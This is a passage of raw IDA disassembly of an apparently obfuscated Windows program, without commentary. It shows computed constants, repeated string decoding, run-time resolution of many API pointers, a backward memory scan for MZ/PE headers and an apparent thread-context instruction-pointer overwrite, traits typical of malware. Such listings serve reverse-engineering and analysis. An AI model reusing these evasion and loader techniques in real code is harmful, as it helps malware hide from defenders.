movsx edx, word ptr ds:10012100h
add edx, 17h
cmp eax, edx
jle short loc_41FDDC
mov edx, ds:100121B8h
add edx, 2Dh
cmp eax, edx
jl short loc_41FE24
loc_41FDDC: ; CODE XREF: sub_41F4F7+8D6�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100120F8h
add edx, 37h
cmp eax, edx
jle short loc_41FDFD
mov edx, ds:100120A4h
add edx, 3Fh
cmp eax, edx
jl short loc_41FE24
loc_41FDFD: ; CODE XREF: sub_41F4F7+8F7�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:100121B4h
add edx, 75h
add edx, ds:100120F0h
cmp eax, edx
jle short loc_41FE2E
mov edx, ds:1001215Ch
add edx, 7Bh
cmp eax, edx
jge short loc_41FE2E
loc_41FE24: ; CODE XREF: sub_41F4F7+8E3�j
; sub_41F4F7+904�j
mov [ebp+var_60EAC], 1
loc_41FE2E: ; CODE XREF: sub_41F4F7+7BD�j
; sub_41F4F7+89F�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_41FE57
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_41FE57: ; CODE XREF: sub_41F4F7+93E�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word ptr ds:100120D8h
add edx, 1Bh
cmp eax, edx
jnz short loc_41FE7D
mov [ebp+var_60EAC], 1
loc_41FE7D: ; CODE XREF: sub_41F4F7+97A�j
inc [ebp+var_40E9C]
loc_41FE83: ; CODE XREF: sub_41F4F7+77D�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_41FC79
mov eax, [ebp+var_60EB4]
mov edx, ds:10012190h
sub edx, 3
mov [ebp+eax+var_50E9B], dl
loc_41FEAB: ; CODE XREF: sub_41F4F7+52B�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41FEB7: ; CODE XREF: sub_41F4F7+4FD�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push 1001392Ch
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012188h
add eax, ds:1001214Ch
sub eax, 6
cmp ebx, eax
jnz loc_4201C9
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word ptr ds:100120E0h
cmp ebx, eax
jnz loc_4201BD
mov eax, ds:100121B0h
mov [ebp+var_50EA0], eax
jmp loc_4201AB
; ---------------------------------------------------------------------------
loc_41FF26: ; CODE XREF: sub_41F4F7+CC0�j
movsx eax, word ptr ds:10012090h
dec eax
push eax
call dword ptr ds:10011630h
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp+var_50EA0]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
movsx eax, word ptr ds:10012128h
movsx edx, word ptr ds:100120D8h
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_4201A5
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push 1001390Ch
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012118h
movsx edx, word ptr ds:100120D8h
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_420199
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:100121B8h
movsx edx, word ptr ds:10012168h
add eax, edx
sub eax, 0Bh
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_420018
cmp [ebp+var_60EF0], 8
jz short loc_42001D
loc_420018: ; CODE XREF: sub_41F4F7+B15�j
jmp loc_42018D
; ---------------------------------------------------------------------------
loc_42001D: ; CODE XREF: sub_41F4F7+B1F�j
mov eax, ds:100121ACh
add eax, ds:100121C4h
mov edx, ds:100120A0h
sub edx, 4
mov byte ptr [ebp+eax+var_70EF8], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_41ADCD
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call dword ptr ds:10011BA0h
movsx eax, word ptr ds:100120BCh
movsx eax, byte ptr [ebp+eax+var_70EF8]
movsx edx, word ptr ds:100120C8h
movsx ecx, word ptr ds:10012170h
add edx, ecx
sub edx, 0Fh
cmp eax, edx
jz loc_42018D
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_42149B
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:100120A0h
sub eax, 4
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, ds:10012098h
mov edx, ds:10012144h
add edx, ds:100121B4h
sub edx, 6
mov [ebp+eax+var_71F0E], dl
or ebx, ebx
jnz short loc_420118
cmp [ebp+var_60EF0], 8
jnz short loc_420118
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_41ADCD
add esp, 8
mov edi, eax
inc edi
mov [ebp-71F10h], edi
push [ebp+var_60EE8]
call dword ptr ds:10011BA0h
loc_420118: ; CODE XREF: sub_41F4F7+BEB�j
; sub_41F4F7+BF5�j
push 10013253h
call sub_4228CE
push [ebp+var_50EA0]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
push 1001324Eh
call sub_4228CE
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 34h
loc_42018D: ; CODE XREF: sub_41F4F7:loc_420018�j
; sub_41F4F7+B8F�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420199: ; CODE XREF: sub_41F4F7+AE0�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4201A5: ; CODE XREF: sub_41F4F7+AA2�j
inc [ebp+var_50EA0]
loc_4201AB: ; CODE XREF: sub_41F4F7+A2A�j
mov eax, [ebp+var_60EBC]
cmp [ebp+var_50EA0], eax
jb loc_41FF26
loc_4201BD: ; CODE XREF: sub_41F4F7+A19�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4201C9: ; CODE XREF: sub_41F4F7+9F5�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, ds:100120F8h
movsx ecx, word ptr ds:10012180h
add edx, ecx
sub edx, 8
cmp eax, edx
jz short loc_420233
push 1001324Bh
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
push 10013246h
call sub_4228CE
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
add esp, 1Ch
loc_420233: ; CODE XREF: sub_41F4F7+493�j
; sub_41F4F7+CF9�j
inc [ebp+var_30E50]
loc_420239: ; CODE XREF: sub_41F4F7+419�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_41F915
loc_42024B: ; CODE XREF: sub_41F4F7+292�j
; sub_41F4F7+31F�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_41F73C
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1001162Ch
pop ecx
push [ebp+var_30E44]
call dword ptr ds:10011BA0h
push [ebp+var_30E48]
call dword ptr ds:10011BA0h
loc_420289: ; CODE XREF: sub_41F4F7+1E5�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420295: ; CODE XREF: sub_41F4F7+1BA�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4202A1: ; CODE XREF: sub_41F4F7+195�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4202AD: ; CODE XREF: sub_41F4F7+B9�j
; sub_41F4F7:loc_41F604�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4202B9: ; CODE XREF: sub_41F4F7+53�j
; sub_41F4F7+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F4F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4202BE proc near ; CODE XREF: .data:0042325B�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
movsx eax, word ptr ds:10012148h
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_4202EC
; ---------------------------------------------------------------------------
loc_4202D6: ; CODE XREF: sub_4202BE+3B�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and dword ptr ds:1000F370h[eax], 0
inc [ebp+var_4]
loc_4202EC: ; CODE XREF: sub_4202BE+16�j
movsx eax, word ptr ds:10012194h
add eax, 64h
cmp [ebp+var_4], eax
jb short loc_4202D6
push 0
call dword ptr ds:1000E0D0h
push 100122D4h
push 1001395Ch
push 7
push 0
push 1001389Ch
call dword ptr ds:1000E620h
mov ebx, eax
movsx eax, word ptr ds:100120B0h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 8
cmp ebx, eax
jnz loc_4204E8
lea eax, [ebp+var_C]
push eax
mov eax, ds:100122D4h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
movsx eax, word ptr ds:1001219Ch
add eax, ds:10012188h
sub eax, 6
cmp ebx, eax
jnz short loc_420374
mov eax, ds:100120C0h
movsx edx, word ptr ds:100120DCh
add eax, edx
sub eax, 7
cmp [ebp+var_C], eax
jnz short loc_420379
loc_420374: ; CODE XREF: sub_4202BE+9E�j
jmp loc_420480
; ---------------------------------------------------------------------------
loc_420379: ; CODE XREF: sub_4202BE+B4�j
mov eax, ds:1001212Ch
add eax, ds:1001213Ch
sub eax, 7
mov [ebp+var_8], eax
jmp loc_420474
; ---------------------------------------------------------------------------
loc_42038F: ; CODE XREF: sub_4202BE+1BC�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:100122D4h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
cmp ebx, ds:10012130h
jnz loc_420471
lea eax, [ebp+var_40]
push eax
push 1001397Ch
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100121CCh
movsx edx, word ptr ds:100120D8h
add eax, edx
sub eax, 9
cmp ebx, eax
jnz short loc_420468
lea eax, ds:100122D0h
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push 100138BCh
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10012194h
movsx edx, word ptr ds:10012180h
add eax, edx
sub eax, 6
cmp ebx, eax
jnz short loc_420456
lea eax, [ebp+var_48]
push eax
push 100138BCh
push [ebp+var_44]
push [ebp+var_40]
call sub_4238BF
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420456: ; CODE XREF: sub_4202BE+173�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420468: ; CODE XREF: sub_4202BE+135�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_420471: ; CODE XREF: sub_4202BE+104�j
inc [ebp+var_8]
loc_420474: ; CODE XREF: sub_4202BE+CC�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_42038F
loc_420480: ; CODE XREF: sub_4202BE:loc_420374�j
lea eax, ds:100122F4h
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push 100138ACh
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push 100138ACh
push [ebp+var_14]
push dword ptr ds:100122D4h
call sub_4238BF
add esp, 10h
mov [ebp+var_18], eax
movsx ecx, word ptr ds:100120D0h
cmp eax, ecx
jnz short loc_4204E8
mov eax, ds:100122D4h
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword ptr ds:100122D4h, 0
loc_4204E8: ; CODE XREF: sub_4202BE+75�j
; sub_4202BE+216�j
pop edi
pop esi
pop ebx
leave
retn
sub_4202BE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 1001396Ch
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_420519
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_420561
; ---------------------------------------------------------------------------
loc_420519: ; CODE XREF: .data:00420507�j
push 100138ECh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_420539
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_420561
; ---------------------------------------------------------------------------
loc_420539: ; CODE XREF: .data:00420527�j
push 100138CCh
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_420559
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_420561
; ---------------------------------------------------------------------------
loc_420559: ; CODE XREF: .data:00420547�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_420561: ; CODE XREF: .data:00420517�j
; .data:00420537�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; =============== S U B R O U T I N E =======================================
sub_420568 proc near ; CODE XREF: .data:00423046�p
push edi
push 10013236h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:100121F8h, eax
test eax, eax
jnz short loc_42059B
push 10013226h
call sub_4228CE
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:100121F8h, eax
loc_42059B: ; CODE XREF: sub_420568+1A�j
push 10013215h
call sub_4228CE
push eax
push dword ptr ds:100121F8h
call dword ptr ds:1000E1F8h
mov ds:1000E5ECh, eax
push 10013201h
call sub_4228CE
push eax
push dword ptr ds:100121F8h
call dword ptr ds:1000E1F8h
mov ds:1000C03Ch, eax
push 100131F2h
call sub_4228CE
add esp, 0Ch
push eax
push dword ptr ds:100121F8h
call dword ptr ds:1000E1F8h
mov ds:10011618h, eax
pop edi
retn
sub_420568 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov esi, [ebp+10h]
mov eax, 10009652h
mov [esi+0B8h], eax
mov eax, [ebp+0Ch]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
db 0C3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:1001218Ch
dec eax
cmp ds:10011BA8h, eax
jbe short loc_420633
push 10011BA8h
call dword ptr ds:1000C010h
loc_420633: ; CODE XREF: .data:00420626�j
mov eax, ds:10011BA8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42063C proc near ; CODE XREF: sub_41E5D9+C2�p
; sub_41E5D9+FF�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, ds:100121B4h
add edx, ds:100120B8h
sub edx, 5
cmp eax, edx
jnz short loc_420680
mov eax, 65h
jmp loc_420707
; ---------------------------------------------------------------------------
loc_420680: ; CODE XREF: sub_42063C+38�j
movzx eax, [ebp+arg_0]
mov edx, ds:100120B8h
movsx ecx, word ptr ds:100120F4h
add edx, ecx
sub edx, 0Ch
cmp eax, edx
jnz short loc_4206A1
mov eax, 79h
jmp short loc_420707
; ---------------------------------------------------------------------------
loc_4206A1: ; CODE XREF: sub_42063C+5C�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100120E0h
add edx, 2
cmp eax, edx
jnz short loc_4206BA
mov eax, 75h
jmp short loc_420707
; ---------------------------------------------------------------------------
loc_4206BA: ; CODE XREF: sub_42063C+75�j
movzx eax, [ebp+arg_0]
mov edx, ds:100121B0h
add edx, ds:100121C4h
sub edx, 2
cmp eax, edx
jnz short loc_4206D8
mov eax, 69h
jmp short loc_420707
; ---------------------------------------------------------------------------
loc_4206D8: ; CODE XREF: sub_42063C+93�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100121BCh
sub edx, 2
cmp eax, edx
jnz short loc_4206F1
mov eax, 6Fh
jmp short loc_420707
; ---------------------------------------------------------------------------
loc_4206F1: ; CODE XREF: sub_42063C+AC�j
movzx eax, [ebp+arg_0]
mov edx, ds:100120FCh
sub edx, 2
cmp eax, edx
jnz short loc_420707
mov eax, 61h
loc_420707: ; CODE XREF: sub_42063C+3F�j
; sub_42063C+63�j ...
pop edi
pop ebx
leave
retn
sub_42063C endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 18h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword ptr ds:1000E614h
pop edi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+18h]
mov [ebp+18h], ax
mov eax, ds:100120ACh
add eax, 0C5h
cmp [ebp+0Ch], eax
jnz loc_420858
mov word ptr [ebp-18h], 3
lea eax, [ebp-10h]
push eax
mov eax, ds:100122D4h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp-4], eax
movsx eax, word ptr ds:1001216Ch
add eax, ds:100121A0h
sub eax, 0Ah
cmp [ebp-4], eax
jnz loc_420854
dec dword ptr [ebp-10h]
lea eax, [ebp-1Ch]
push eax
lea esi, [ebp-18h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:100122D4h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp-4], eax
mov eax, ds:100120B4h
sub eax, 8
cmp [ebp-4], eax
jnz loc_420854
lea eax, [ebp-20h]
push eax
push 1001397Ch
mov eax, [ebp-1Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:100120ACh
sub eax, 3
cmp [ebp-4], eax
jnz short loc_42084B
lea eax, ds:100122D0h
mov [ebp-8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp-24h]
push eax
push 100138BCh
mov eax, [ebp-8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
mov eax, ds:100120A8h
sub eax, 3
cmp [ebp-4], eax
jnz short loc_420839
lea eax, [ebp-2Ch]
push eax
push 100138BCh
push dword ptr [ebp-24h]
push dword ptr [ebp-20h]
call sub_4238BF
add esp, 10h
mov [ebp-28h], eax
mov eax, [ebp-24h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_420839: ; CODE XREF: .data:00420814�j
mov eax, [ebp-8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp-20h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_42084B: ; CODE XREF: .data:004207DF�j
mov eax, [ebp-1Ch]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_420854: ; CODE XREF: .data:0042077F�j
; .data:004207B5�j
xor eax, eax
jmp short loc_42085D
; ---------------------------------------------------------------------------
loc_420858: ; CODE XREF: .data:0042074E�j
mov eax, 80020003h
loc_42085D: ; CODE XREF: .data:00420856�j
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
sub_420864 proc near ; CODE XREF: .data:00420FBC�p
push edi
push 100131E4h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011660h, eax
push 100131DCh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000D00Ch, eax
push 100131C8h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E5E8h, eax
push 100131B8h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000F244h, eax
push 100131A9h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011788h, eax
push 1001319Ah
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C008h, eax
push 10013188h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011B9Ch, eax
push 1001317Bh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011B8Ch, eax
push 1001316Ch
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10010650h, eax
push 1001315Dh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011624h, eax
push 10013151h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C000h, eax
push 10013146h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E0E0h, eax
push 1001312Fh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C00Ch, eax
push 10013118h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1001163Ch, eax
push 10013102h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011608h, eax
push 100130F2h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C034h, eax
push 100130E6h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C028h, eax
push 100130D6h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000F248h, eax
push 100130C7h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10010630h, eax
push 100130B9h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000EA34h, eax
push 100130ACh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E618h, eax
push 1001309Bh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000F25Ch, eax
push 1001308Ah
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C02Ch, eax
push 1001307Ah
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011770h, eax
push 10013068h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000F258h, eax
push 10013057h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000D004h, eax
push 1001304Ah
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E608h, eax
push 10013039h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011664h, eax
push 10013024h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1001164Ch, eax
push 10013014h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000D000h, eax
push 10012FFFh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E0D4h, eax
push 10012FF2h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000F364h, eax
push 10012FE2h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1001161Ch, eax
push 10012FD4h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10010644h, eax
push 10012FBEh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10010638h, eax
push 10012FA7h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E5FCh, eax
push 10012F8Fh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000EA3Ch, eax
push 10012F77h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000C010h, eax
push 10012F5Eh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011614h, eax
push 10012F4Bh
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011780h, eax
push 10012F33h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011778h, eax
push 10012F22h
call sub_4228CE
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:10011B98h, eax
push 10012F10h
call sub_4228CE
add esp, 0ACh
push eax
push dword ptr ds:100121D4h
call dword ptr ds:1000E1F8h
mov ds:1000E5F4h, eax
pop edi
retn
sub_420864 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_420D24: ; CODE XREF: .data:00420D4D�j
push dword ptr ds:100121A4h
call dword ptr ds:10011630h
pop ecx
mov eax, ds:100121CCh
add eax, ds:100121A0h
sub eax, 0Ah
push eax
push 10009318h
push 0
call dword ptr ds:1000C048h
jmp short loc_420D24
; ---------------------------------------------------------------------------
db 5Dh
db 0C2h, 4, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, ds:10009C0Ah
mov [ebp-10h], eax
mov edx, eax
movsx ecx, word ptr ds:10012128h
add ecx, 10h
mov eax, edx
shr eax, cl
movsx edx, word ptr ds:1001216Ch
add edx, 0Ch
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_420D88: ; CODE XREF: .data:00420DAB�j
; .data:00420DDC�j ...
mov [ebp-18h], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_420DAD
movsx eax, word ptr ds:100120BCh
movsx edx, word ptr ds:10012194h
lea eax, [eax+edx+0FFF7h]
sub ebx, eax
jmp short loc_420D88
; ---------------------------------------------------------------------------
loc_420DAD: ; CODE XREF: .data:00420D92�j
movsx eax, word ptr ds:10012100h
lea eax, [eax+eax+2Ah]
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
cmp eax, ecx
jbe short loc_420DDE
mov eax, ds:100121ACh
add eax, 0FFFCh
add eax, ds:100121B0h
sub ebx, eax
jmp short loc_420D88
; ---------------------------------------------------------------------------
loc_420DDE: ; CODE XREF: .data:00420DC8�j
mov eax, [ebp-14h]
mov [ebp-8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_420DFE
movsx eax, word ptr ds:1001219Ch
